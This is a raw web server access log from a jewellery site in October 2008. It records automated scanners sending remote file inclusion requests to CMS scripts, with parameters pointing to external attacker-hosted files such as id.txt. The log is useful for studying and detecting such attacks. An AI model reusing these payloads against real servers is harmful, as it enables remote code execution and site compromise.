216.17.107.161 - - [30/Oct/2008:20:56:16 -0700] "GET /logs/access_080531.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
66.239.210.245 - - [30/Oct/2008:20:57:03 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
66.239.210.245 - - [30/Oct/2008:20:58:56 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
66.239.210.245 - - [30/Oct/2008:20:58:56 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
66.239.210.245 - - [30/Oct/2008:20:58:56 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
66.239.210.245 - - [30/Oct/2008:21:00:21 -0700] "GET /logs/access_080531.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
216.17.107.161 - - [30/Oct/2008:21:00:28 -0700] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.17.107.161 - - [30/Oct/2008:21:00:29 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:21:00:35 -0700] "GET /logs/access.log/?sourcedir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:21:00:36 -0700] "GET /?sourcedir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:21:00:36 -0700] "GET /logs/?sourcedir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 200 1796 "-" "libwww-perl/5.803" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:21:01:35 -0700] "GET /logs/access.log/?sourcedir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:21:01:35 -0700] "GET /?sourcedir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:21:01:36 -0700] "GET /logs/?sourcedir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 200 1796 "-" "libwww-perl/5.79" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:05:02 -0700] "GET /logs/access.log/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:05:02 -0700] "GET /errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:05:02 -0700] "GET /logs/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:05:02 -0700] "GET /logs/access.log/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:05:02 -0700] "GET /errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:05:02 -0700] "GET /logs/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:05:03 -0700] "GET /logs/access.log/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:05:03 -0700] "GET /logs/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:05:03 -0700] "GET /errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:05:05 -0700] "GET /logs/access.log/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:05:05 -0700] "GET /errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:05:05 -0700] "GET /logs/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
216.17.107.161 - - [30/Oct/2008:21:07:15 -0700] "GET /logs/access.log//include.php?path[docroot]=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.17.107.161 - - [30/Oct/2008:21:07:16 -0700] "GET /include.php?path[docroot]=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.17.107.161 - - [30/Oct/2008:21:07:16 -0700] "GET /logs//include.php?path[docroot]=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
64.128.80.16 - - [30/Oct/2008:21:07:57 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.asa-auto.ba/mambo/cache/scan/readme.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
72.29.68.220 - - [30/Oct/2008:21:17:46 -0700] "GET /logs/access.log/errors.php?error=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.29.68.220 - - [30/Oct/2008:21:17:46 -0700] "GET /errors.php?error=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.29.68.220 - - [30/Oct/2008:21:17:46 -0700] "GET /logs/errors.php?error=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
64.38.4.3 - - [30/Oct/2008:21:18:14 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
64.38.4.3 - - [30/Oct/2008:21:18:14 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
64.38.4.3 - - [30/Oct/2008:21:18:14 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
64.38.4.3 - - [30/Oct/2008:21:19:04 -0700] "GET /logs/access_080531.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:21:57 -0700] "GET /logs/access.log/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:21:57 -0700] "GET /errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:21:57 -0700] "GET /logs/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:22:01 -0700] "GET /logs/access.log/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:22:02 -0700] "GET /errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:22:03 -0700] "GET /logs/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:22:05 -0700] "GET /errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:22:05 -0700] "GET /logs/access.log/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:22:05 -0700] "GET /logs/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:22:15 -0700] "GET /errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:22:15 -0700] "GET /logs/access.log/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:22:15 -0700] "GET /logs/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
202.171.48.89 - - [30/Oct/2008:21:23:09 -0700] "GET /logs/access.log/errors.php?error=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.171.48.89 - - [30/Oct/2008:21:23:09 -0700] "GET /logs/access.log/errors.php?error=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.171.48.89 - - [30/Oct/2008:21:23:10 -0700] "GET /errors.php?error=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.171.48.89 - - [30/Oct/2008:21:23:10 -0700] "GET /errors.php?error=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.171.48.89 - - [30/Oct/2008:21:23:10 -0700] "GET /logs/errors.php?error=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.171.48.89 - - [30/Oct/2008:21:23:10 -0700] "GET /logs/errors.php?error=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
64.38.4.3 - - [30/Oct/2008:21:23:20 -0700] "GET /logs/access_080531.log%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:21:24:39 -0700] "GET /logs/scripts.log/index.php3?p=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:21:24:45 -0700] "GET /logs/index.php3?p=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:21:25:52 -0700] "GET /logs/scripts.log/index.php3?s=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:21:25:53 -0700] "GET /index.php3?s=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:21:25:57 -0700] "GET /logs/index.php3?s=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:21:26:31 -0700] "GET /logs/scripts.log/index.php4?lang=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:21:26:35 -0700] "GET /index.php4?lang=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:21:26:40 -0700] "GET /logs/index.php4?lang=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:21:26:48 -0700] "GET /logs/scripts.log/index.php3?s=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:21:26:52 -0700] "GET /index.php3?s=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:21:26:58 -0700] "GET /logs/index.php3?s=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:21:27:50 -0700] "GET /logs/scripts.log/index.php4?lang=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:21:27:54 -0700] "GET /index.php4?lang=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:21:27:59 -0700] "GET /logs/index.php4?lang=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:28:31 -0700] "GET /logs/scripts.log/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:28:45 -0700] "GET /logs/scripts.log/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
69.20.61.45 - - [30/Oct/2008:21:28:49 -0700] "GET /logs/[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
69.20.61.45 - - [30/Oct/2008:21:28:49 -0700] "GET /logs/access_080831.log/[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
154.5.252.194 - - [30/Oct/2008:21:28:59 -0700] "GET /logs/access_081001.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:28:59 -0700] "GET /logs/scripts.log/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.218.85.18 - - [30/Oct/2008:21:30:42 -0700] "GET /logs/scripts.log/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
202.222.25.87 - - [30/Oct/2008:21:31:32 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.222.25.87 - - [30/Oct/2008:21:31:32 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.222.25.87 - - [30/Oct/2008:21:31:32 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:21:32:22 -0700] "GET /logs/index.php3?s=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:21:32:23 -0700] "GET /index.php3?s=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.206.182.158 - - [30/Oct/2008:21:33:49 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.206.182.158 - - [30/Oct/2008:21:33:49 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.206.182.158 - - [30/Oct/2008:21:33:49 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.222.25.87 - - [30/Oct/2008:21:34:50 -0700] "GET /logs/access_080531.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.206.182.158 - - [30/Oct/2008:21:37:13 -0700] "GET /logs/access_080531.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:21:37:13 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:21:37:13 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:21:37:16 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:21:43:13 -0700] "GET /logs/access_080531.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:21:43:13 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:21:43:13 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:21:44:18 -0700] "GET /logs/access_080531.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
72.29.68.220 - - [30/Oct/2008:21:44:50 -0700] "GET /logs/scripts.log/errors.php?error=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
208.226.79.133 - - [30/Oct/2008:21:47:38 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solca-ws.bogotanos.net/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:21:50:09 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
88.84.145.169 - - [30/Oct/2008:21:58:42 -0700] "GET /logs/access_080501.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
88.84.145.169 - - [30/Oct/2008:21:58:42 -0700] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
88.84.145.169 - - [30/Oct/2008:21:58:42 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
88.84.145.169 - - [30/Oct/2008:22:00:27 -0700] "GET /logs/access_080531.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
88.84.145.169 - - [30/Oct/2008:22:00:28 -0700] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
88.84.145.169 - - [30/Oct/2008:22:00:28 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
208.226.79.133 - - [30/Oct/2008:22:00:46 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solca-ws.bogotanos.net/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
208.226.79.133 - - [30/Oct/2008:22:00:48 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solca-ws.bogotanos.net/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
75.151.18.250 - - [30/Oct/2008:22:06:11 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solca-ws.bogotanos.net/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:22:07:25 -0700] "GET /logs/scripts.log/index.php4?lang=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:22:07:29 -0700] "GET /index.php4?lang=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
88.84.145.169 - - [30/Oct/2008:22:07:42 -0700] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:22:08:03 -0700] "GET /logs/scripts.log/index.php4?lang=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:22:08:07 -0700] "GET /index.php4?lang=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.80.180.36 - - [30/Oct/2008:22:08:10 -0700] "GET /logs/index.php4?lang=http://br.geocities.com/murilobotnet/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
70.86.69.138 - - [30/Oct/2008:22:09:11 -0700] "GET /logs/access.log//include/write.php?dir=http://tesz.cscsecurity.org/tclkz/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.sojewels.com"
70.86.69.138 - - [30/Oct/2008:22:09:11 -0700] "GET /include/write.php?dir=http://tesz.cscsecurity.org/tclkz/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.sojewels.com"
70.86.69.138 - - [30/Oct/2008:22:09:11 -0700] "GET /logs//include/write.php?dir=http://tesz.cscsecurity.org/tclkz/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.sojewels.com"
70.86.69.138 - - [30/Oct/2008:22:09:15 -0700] "GET /logs/access.log//include/write.php?dir=http://tesz.cscsecurity.org/tclkz/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.sojewels.com"
70.86.69.138 - - [30/Oct/2008:22:09:16 -0700] "GET /include/write.php?dir=http://tesz.cscsecurity.org/tclkz/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.sojewels.com"
70.86.69.138 - - [30/Oct/2008:22:09:16 -0700] "GET /logs//include/write.php?dir=http://tesz.cscsecurity.org/tclkz/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.sojewels.com"
202.171.48.89 - - [30/Oct/2008:22:09:59 -0700] "GET /logs/errors.php?error=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.171.48.89 - - [30/Oct/2008:22:09:59 -0700] "GET /logs/errors.php?error=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
